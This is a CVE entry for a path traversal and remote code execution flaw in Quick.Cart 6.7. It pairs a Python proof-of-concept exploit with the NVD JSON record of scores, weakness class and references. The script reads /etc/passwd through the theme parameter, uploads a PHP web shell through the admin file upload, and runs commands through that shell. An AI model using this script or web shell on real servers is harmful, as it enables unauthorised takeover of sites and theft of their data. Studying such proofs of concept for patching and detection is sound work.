CVE-2025-67684

import requests import sys # CVE-2025-67684 PoC - Quick.Cart LFI/RCE # Target: Quick.Cart with vulnerable theme selection mechanism TARGET_URL = "http://target.com/quick-cart" USERNAME = "admin" PASSWORD = "admin123" def exploit_lfi(): """ Step 1: Exploit Local File Inclusion via theme selection The theme parameter is vulnerable to path traversal """ lfi_payload = "../../../../../../etc/passwd" lfi_url = f"{TARGET_URL}/?p=theme&change={lfi_payload}" print(f"[*] Testing LFI via theme parameter...") response = requests.get(lfi_url) if "root:" in response.text or "/bin/bash" in response.text: print("[+] LFI confirmed - /etc/passwd leaked") return True return False def upload_shell(): """ Step 2: Upload malicious PHP shell File upload only validates extension (.php allowed) """ shell_content = "<?php system($_GET['cmd']); ?>" shell_filename = "shell.php" upload_url = f"{TARGET_URL}/admin.php?p=files&action=upload" files = {'file': (shell_filename, shell_content, 'application/x-httpd-php')} data = {'username': USERNAME, 'password': PASSWORD} print(f"[*] Uploading malicious PHP shell...") response = requests.post(upload_url, files=files, data=data) if "success" in response.text.lower(): print("[+] Shell uploaded successfully") return f"{TARGET_URL}/uploads/shell.php" return None def execute_rce(shell_url, cmd): """ Step 3: Execute arbitrary commands via uploaded shell """ rce_url = f"{shell_url}?cmd={cmd}" response = requests.get(rce_url) return response.text if __name__ == "__main__": print("[*] CVE-2025-67684 Quick.Cart LFI/RCE Exploit") # Test LFI if exploit_lfi(): print("[+] LFI vulnerability confirmed") # Upload and execute shell shell_url = upload_shell() if shell_url: print(f"[*] Shell location: {shell_url}") result = execute_rce(shell_url, "whoami") print(f"[+] Command output: {result}")

{"cve": {"id": "CVE-2025-67684", "sourceIdentifier": "[email protected]", "published": "2026-01-22T12:15:55.417", "lastModified": "2026-02-19T18:33:15.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quick.Cart is vulnerable to Local File Inclusion and Path Traversal issues in the theme selection mechanism. Quick.Cart allows a privileged user to upload arbitrary file contents while only validating the filename extension. This allows an attacker to include and execute uploaded PHP code, resulting in Remote Code Execution on the server.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}, {"lang": "es", "value": "Quick.Cart es vulnerable a problemas de inclusión local de ficheros y salto de ruta en el mecanismo de selección de temas. Quick.Cart permite a un usuario privilegiado subir contenido de ficheros arbitrario mientras solo valida la extensión del nombre de fichero. Esto permite a un atacante incluir y ejecutar código PHP subido, lo que resulta en ejecución remota de código en el servidor.\n\nEl proveedor fue notificado con antelación sobre esta vulnerabilidad, pero no respondió con los detalles de la vulnerabilidad o el rango de versiones vulnerables. Solo la versión 6.7 fue probada y confirmada como vulnerable, otras versiones no fueron probadas y también podrían ser vulnerables."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cart:6.7:*:*:*:*:*:*:*", "matchCriteriaId": "0544991D-06F2-4207-BAA0-5045BC483E61"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/01/CVE-2025-67683", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/sklep-internetowy-quick-cart.html", "source": "[email protected]", "tags": ["Product"]}]}}